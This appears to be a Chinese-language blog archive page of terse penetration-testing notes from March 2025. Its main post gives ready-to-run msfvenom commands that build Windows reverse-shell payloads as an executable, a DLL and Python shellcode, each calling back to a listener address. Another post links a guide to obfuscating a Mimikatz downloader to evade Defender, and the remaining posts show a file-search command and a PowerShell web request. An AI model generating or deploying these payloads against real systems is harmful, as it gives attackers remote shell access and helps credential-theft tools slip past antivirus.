發表文章

目前顯示的是 3月, 2025的文章

用metaexploit建立netcat reverse shell

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f exe -o shell.exe  msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f dll -o shell.dll msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.171 LPORT=443 -f python -v shellcode -b "\x00\x20" 作業系統,或應用程式,可能是32 bit

Obfuscating a Mimikatz Downloader to Evade Defender (2024)

 https://medium.com/@luisgerardomoret_69654/obfuscating-a-mimikatz-downloader-to-evade-defender-2024-b3a9098f0ae7

找檔案

 Windows: dir /s /p <filename>

IWR 用法

  iwr "https://example.com" | Select-Object -ExpandProperty Content